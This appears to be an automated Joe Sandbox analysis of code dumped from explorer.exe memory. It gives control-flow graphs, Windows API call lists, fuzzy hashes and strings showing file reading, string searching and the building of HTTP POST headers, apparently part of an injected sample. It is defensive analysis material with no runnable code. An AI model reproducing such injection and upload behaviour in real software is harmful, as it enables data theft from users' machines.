                                                                                  control_flow_graph 171 c20a7-c2102 call c2415 call c29b7 call c2938 call c24cc 180 c211d-c2129 171->180 181 c2104-c211b 171->181 184 c212d-c212f 180->184 181->184 185 c2135-c216c RtlZeroMemory 184->185 186 c2403-c2412 call c2999 184->186 190 c23fb-c2402 185->190 191 c2172-c218d 185->191 190->186 192 c21bf-c21d1 191->192 193 c218f-c21a0 call c243d 191->193 200 c21d5-c21d7 192->200 198 c21a2-c21b1 193->198 199 c21b3 193->199 201 c21b5-c21bd 198->201 199->201 202 c21dd-c2239 call c2866 200->202 203 c23e8-c23ee 200->203 201->200 211 c223f-c2244 202->211 212 c23e1 202->212 205 c23f7 203->205 206 c23f0-c23f2 call c2999 203->206 205->190 206->205 213 c225e-c228c call c29b7 wsprintfW 211->213 214 c2246-c2257 211->214 212->203 217 c228e-c2290 213->217 218 c22a5-c22bc 213->218 214->213 219 c2291-c2294 217->219 223 c22be-c22f4 call c29b7 wsprintfW 218->223 224 c22fb-c2315 218->224 221 c229f-c22a1 219->221 222 c2296-c229b 219->222 221->218 222->219 225 c229d 222->225 223->224 229 c23be-c23d4 call c2999 224->229 230 c231b-c232e 224->230 225->218 237 c23dd 229->237 238 c23d6-c23d8 call c2999 229->238 230->229 234 c2334-c234a call c29b7 230->234 241 c234c-c2357 234->241 237->212 238->237 242 c2359-c2366 call c297c 241->242 243 c236b-c2382 241->243 242->243 247 c2384 243->247 248 c2386-c2393 243->248 247->248 248->241 249 c2395-c2399 248->249 250 c239b 249->250 251 c23b3-c23ba call c2999 249->251 252 c239b call c296b 250->252 251->229 254 c23a0-c23ad RtlMoveMemory 252->254 254->251
                                                                                  APIs
                                                                                    • Part of subcall function 000C29B7: GetProcessHeap.KERNEL32(00000008,00000412,000C257A,000C18F4), ref: 000C29BA
                                                                                    • Part of subcall function 000C29B7: RtlAllocateHeap.NTDLL(00000000), ref: 000C29C1
                                                                                    • Part of subcall function 000C2938: lstrlen.KERNEL32(00A1ACC6,?,00000000,00000000,000C20E3,75572B62,00A1ACC6,00000000), ref: 000C2940
                                                                                    • Part of subcall function 000C2938: MultiByteToWideChar.KERNEL32(00000000,00000000,00A1ACC6,00000001,00000000,00000000), ref: 000C2952
                                                                                    • Part of subcall function 000C24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000C24DE
                                                                                  • RtlZeroMemory.NTDLL(?,0000003C), ref: 000C213F
                                                                                  • wsprintfW.USER32 ref: 000C2278
                                                                                  • wsprintfW.USER32 ref: 000C22E3
                                                                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C23AD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                  • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                  • API String ID: 4204651544-1701262698
                                                                                  • Opcode ID: f7e071f5641976caf3be4e6919733daca0adc36064473c41f865b7ba5d976fb5
                                                                                  • Instruction ID: 16c5a2b19a57c78c50bac1f38d408f1366155ba9572a1e1ad172e3970505f362
                                                                                  • Opcode Fuzzy Hash: f7e071f5641976caf3be4e6919733daca0adc36064473c41f865b7ba5d976fb5
                                                                                  • Instruction Fuzzy Hash: A5A159B1608340AFE750DF68D894F6FBBE8EB88344F14492DF985D7252DA34DA048B52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 256 c1ece-c1eec StrStrIA 257 c1eee-c1ef0 256->257 258 c1ef5-c1f35 RtlMoveMemory * 2 StrStrIA 256->258 259 c1fab-c1fb3 257->259 260 c1fa7 258->260 261 c1f37-c1f48 StrStrIA 258->261 262 c1fa9-c1faa 260->262 261->260 263 c1f4a-c1f5b StrStrIA 261->263 262->259 263->260 264 c1f5d-c1f68 lstrlen 263->264 265 c1f6a 264->265 266 c1fa3-c1fa5 264->266 267 c1f6c-c1f78 call c1ffb 265->267 266->262 270 c1f7a-c1f80 267->270 271 c1f9b-c1fa1 lstrlen 267->271 272 c1f87-c1f8a 270->272 273 c1f82-c1f85 270->273 271->266 271->267 272->271 274 c1f8c-c1f8f 272->274 273->271 273->272 274->271 275 c1f91-c1f94 274->275 275->271 276 c1f96-c1f99 275->276 276->260 276->271
                                                                                  APIs
                                                                                  • StrStrIA.SHLWAPI(?,000C31D8), ref: 000C1EE4
                                                                                  • RtlMoveMemory.NTDLL(?,?,00000000), ref: 000C1F08
                                                                                  • RtlMoveMemory.NTDLL(?,?,00000100), ref: 000C1F22
                                                                                  • StrStrIA.SHLWAPI(00000000,?), ref: 000C1F31
                                                                                  • StrStrIA.SHLWAPI(00000000,?), ref: 000C1F44
                                                                                  • StrStrIA.SHLWAPI(?,?), ref: 000C1F57
                                                                                  • lstrlen.KERNEL32(?,?,00000000), ref: 000C1F64
                                                                                  • lstrlen.KERNEL32(?,?,?,00000000), ref: 000C1F9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryMovelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 456560858-0
                                                                                  • Opcode ID: 4c84832b5c11f0000fdc5cb0f9dc65a948721534a6f945f5e2f3b93b55969e2c
                                                                                  • Instruction ID: 2a3854e0f42915189ab188e3c34b52a0fef24e7a57ed4b5554b40881f714ed1f
                                                                                  • Opcode Fuzzy Hash: 4c84832b5c11f0000fdc5cb0f9dc65a948721534a6f945f5e2f3b93b55969e2c
                                                                                  • Instruction Fuzzy Hash: 26214C725043096AD670EBA49C85FEF77DC9F47344F01093EAA44C3112E729D94B96A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 292 c1e44-c1e59 293 c1ec8-c1ecd 292->293 294 c1e5b-c1e73 lstrlen CharLowerBuffA 292->294 295 c2671-c267d 293->295 296 c1e9d-c1eaa call c26fc 294->296 297 c1e75-c1e7b 294->297 300 c267f-c2688 295->300 301 c26a9-c26ab 295->301 303 c1ec7 296->303 307 c1eac-c1eb5 call c1ece 296->307 298 c1e7f-c1e89 lstrcmpi 297->298 302 c1e8b-c1e9b 298->302 298->303 305 c268a-c2690 300->305 306 c2692-c26a8 lstrlen RtlMoveMemory 300->306 302->296 302->298 303->293 305->306 306->301 307->303 310 c1eb7-c1ec2 307->310 310->295
                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,000C1BF4), ref: 000C1E5D
                                                                                  • CharLowerBuffA.USER32(?,00000000), ref: 000C1E69
                                                                                  • lstrcmpi.KERNEL32(?,00A1C00C), ref: 000C1E81
                                                                                  • lstrlen.KERNEL32(?,00000000), ref: 000C2699
                                                                                  • RtlMoveMemory.NTDLL(00A1C00C,?,00000000), ref: 000C26A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 2826435453-0
                                                                                  • Opcode ID: 7e59386ada73bc835c65742f067ce1482a96d9aef41c4f4db060d9a26084a96e
                                                                                  • Instruction ID: 2f805d39ea5e1404479f2cd7c59a80d8bd1537252cbeb0c22c34b1b8549d8b1d
                                                                                  • Opcode Fuzzy Hash: 7e59386ada73bc835c65742f067ce1482a96d9aef41c4f4db060d9a26084a96e
                                                                                  • Instruction Fuzzy Hash: 2321D4B36002105FE7109B28EC84EFE77DDEF8A325B10442EE805C7242D776990687A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 311 c1e3e-c1e59 312 c1ec8-c1ecd 311->312 313 c1e5b-c1e73 lstrlen CharLowerBuffA 311->313 314 c2671-c267d 312->314 315 c1e9d-c1eaa call c26fc 313->315 316 c1e75-c1e7b 313->316 319 c267f-c2688 314->319 320 c26a9-c26ab 314->320 322 c1ec7 315->322 326 c1eac-c1eb5 call c1ece 315->326 317 c1e7f-c1e89 lstrcmpi 316->317 321 c1e8b-c1e9b 317->321 317->322 324 c268a-c2690 319->324 325 c2692-c26a8 lstrlen RtlMoveMemory 319->325 321->315 321->317 322->312 324->325 325->320 326->322 329 c1eb7-c1ec2 326->329 329->314
                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,000C1BF4), ref: 000C1E5D
                                                                                  • CharLowerBuffA.USER32(?,00000000), ref: 000C1E69
                                                                                  • lstrcmpi.KERNEL32(?,00A1C00C), ref: 000C1E81
                                                                                  • lstrlen.KERNEL32(?,00000000), ref: 000C2699
                                                                                  • RtlMoveMemory.NTDLL(00A1C00C,?,00000000), ref: 000C26A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 2826435453-0
                                                                                  • Opcode ID: 08c13a563a949b8f2fa3844242b875b540c5fabef00882d95dcf3b2b63da2d32
                                                                                  • Instruction ID: 29541c2ff876b0e5bd944702bd6d8e2863ad17593a4ca8ed182778de3beed081
                                                                                  • Opcode Fuzzy Hash: 08c13a563a949b8f2fa3844242b875b540c5fabef00882d95dcf3b2b63da2d32
                                                                                  • Instruction Fuzzy Hash: 2A21C376A002109FD710DF24EC94EEF77EDEF8A314B11446DEC45D7252C775990687A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 330 c18f4-c1917 CreateFileW 331 c196d-c196f 330->331 332 c1919-c1927 GetFileSize 330->332 333 c1929-c192b 332->333 334 c1965-c196c CloseHandle 332->334 333->334 335 c192d-c1949 call c29b7 ReadFile 333->335 334->331 338 c195d-c1964 call c2999 335->338 339 c194b-c1958 call c1c39 call c1972 335->339 338->334 339->338
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 000C190C
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 000C191C
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 000C1966
                                                                                    • Part of subcall function 000C29B7: GetProcessHeap.KERNEL32(00000008,00000412,000C257A,000C18F4), ref: 000C29BA
                                                                                    • Part of subcall function 000C29B7: RtlAllocateHeap.NTDLL(00000000), ref: 000C29C1
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000C1941
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000012.00000002.1037095992.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_18_2_c1000_explorer.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                  • String ID:
                                                                                  • API String ID: 2517252058-0
                                                                                  • Opcode ID: e4010c8e73bbd2b7fae6780c60e2802af18a131f9e15bd54ad5eec667977e462
                                                                                  • Instruction ID: 9c6e1aeba464d03109eca6bcfc8f21e0cf8b4fd09461c28eedd2724c3e2c85b2
                                                                                  • Opcode Fuzzy Hash: e4010c8e73bbd2b7fae6780c60e2802af18a131f9e15bd54ad5eec667977e462
                                                                                  • Instruction Fuzzy Hash: 6401D6333002147BE2216B359CA8FEF7A9DDB87BA4F11422DB556A21E2DE359D058270
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%